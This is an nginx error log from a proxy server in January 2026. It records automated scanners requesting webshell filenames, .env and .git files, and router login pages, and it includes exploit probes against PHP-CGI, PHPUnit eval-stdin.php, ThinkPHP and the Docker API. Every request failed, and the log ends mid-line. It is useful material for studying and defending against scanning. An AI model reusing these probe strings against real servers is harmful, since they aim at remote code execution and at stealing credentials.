"GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/wp-admin/zwso.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/wp-content/plugins/hellopress/wp_mna.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/shlo.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /shlo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/133.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /133.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:43 [error] 279#279: *33211 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/php8.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /php8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/lufix1.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /lufix1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/witmm.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /witmm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/wp-admin/css/index.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:44 [error] 279#279: *33211 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/wp-editor.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/txets.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/wp-content/txets.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/wp-admin/txets.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/postnews.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:45 [error] 279#279: *33211 open() "/var/www/html/wp-content/postnews.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:46 [error] 279#279: *33211 open() "/var/www/html/wp-admin/postnews.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 05:37:39 [error] 279#279: *34716 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.142.125.220, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "92.249.249.197" +2026/01/14 05:47:56 [error] 279#279: *34717 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 05:50:58 [error] 280#280: *34720 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 128.203.204.32, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "92.249.249.197" +2026/01/14 06:19:47 [error] 277#277: *34733 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "92.249.249.197" +2026/01/14 06:58:21 [error] 277#277: *34758 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/14 06:58:22 [error] 277#277: *34760 open() "/var/www/html/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "92.249.249.197" +2026/01/14 06:58:23 [error] 277#277: *34762 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "92.249.249.197" +2026/01/14 06:58:24 [error] 277#277: *34764 open() "/var/www/html/public/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/env HTTP/1.1", host: "92.249.249.197" +2026/01/14 06:58:25 [error] 277#277: *34766 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/14 07:05:05 [error] 277#277: *34768 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 09:10:52 [error] 278#278: *36513 open() "/var/www/html/.git/index" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/index HTTP/1.1", host: "92.249.249.197" +2026/01/14 09:37:15 [error] 279#279: *36525 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 10:24:57 [error] 277#277: *38018 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 101.91.110.6, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 10:24:59 [error] 277#277: *38019 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 101.91.110.141, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 10:25:02 [error] 277#277: *38020 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 101.91.110.162, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 10:50:44 [error] 286#286: *38029 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 11:05:37 [error] 287#287: *38038 open() "/var/www/html/.env" failed (2: No such file or directory), client: 141.98.11.171, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 11:48:42 [error] 284#284: *38052 "/var/www/html/.git/refs/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/refs/ HTTP/1.1", host: "92.249.249.197" +2026/01/14 12:38:59 [error] 284#284: *38062 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 12:43:10 [error] 285#285: *38064 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 12:43:41 [error] 285#285: *38065 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 184.105.139.70, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "92.249.249.197" +2026/01/14 12:52:16 [error] 287#287: *39554 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 184.105.139.70, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92.249.249.197" +2026/01/14 13:00:28 [error] 287#287: *39556 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 94.243.8.138, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" +2026/01/14 14:51:53 [error] 286#286: *41074 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/14 15:45:00 [error] 287#287: *41082 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 15:55:22 [error] 287#287: *41084 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 16:05:41 [error] 287#287: *41108 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "92.249.249.197" +2026/01/14 16:30:07 [error] 284#284: *41112 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 17:25:37 [error] 294#294: *41124 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 18:12:43 [error] 291#291: *41145 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/14 18:25:59 [error] 291#291: *41148 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 95.214.55.71, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 19:47:05 [error] 294#294: *42873 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:25 [error] 292#292: *44411 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:26 [error] 292#292: *44411 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:27 [error] 292#292: *44411 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:27 [error] 292#292: *44411 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:27 [error] 292#292: *44411 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:28 [error] 292#292: *44411 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:28 [error] 292#292: *44411 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:28 [error] 292#292: *44411 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:29 [error] 292#292: *44411 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:29 [error] 292#292: *44411 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:29 [error] 292#292: *44411 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:30 [error] 292#292: *44411 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:30 [error] 292#292: *44411 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:30 [error] 292#292: *44411 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:31 [error] 292#292: *44411 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:31 [error] 292#292: *44411 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:32 [error] 292#292: *44411 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:32 [error] 292#292: *44411 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:33 [error] 292#292: *44411 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:33 [error] 292#292: *44411 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:33 [error] 292#292: *44411 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:34 [error] 292#292: *44411 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:34 [error] 292#292: *44411 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:34 [error] 292#292: *44411 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:35 [error] 292#292: *44411 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:35 [error] 292#292: *44411 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:35 [error] 292#292: *44411 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:36 [error] 292#292: *44411 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:36 [error] 292#292: *44411 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:37 [error] 292#292: *44411 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:37 [error] 292#292: *44411 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:38 [error] 292#292: *44411 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:38 [error] 292#292: *44411 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:39 [error] 292#292: *44411 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:39 [error] 292#292: *44411 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:39 [error] 292#292: *44411 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:40 [error] 292#292: *44411 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:40 [error] 292#292: *44411 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:40 [error] 292#292: *44411 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:41 [error] 292#292: *44411 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:15:42 [error] 292#292: *44411 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:18:30 [error] 293#293: *44416 "/var/www/html/.git/refs/heads/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/refs/heads/ HTTP/1.1", host: "92.249.249.197" +2026/01/14 20:27:05 [error] 293#293: *44423 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/14 20:52:34 [error] 294#294: *44440 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:34 [error] 294#294: *44440 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:34 [error] 294#294: *44440 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:35 [error] 294#294: *44440 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:35 [error] 294#294: *44440 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:35 [error] 294#294: *44440 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:35 [error] 294#294: *44440 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, 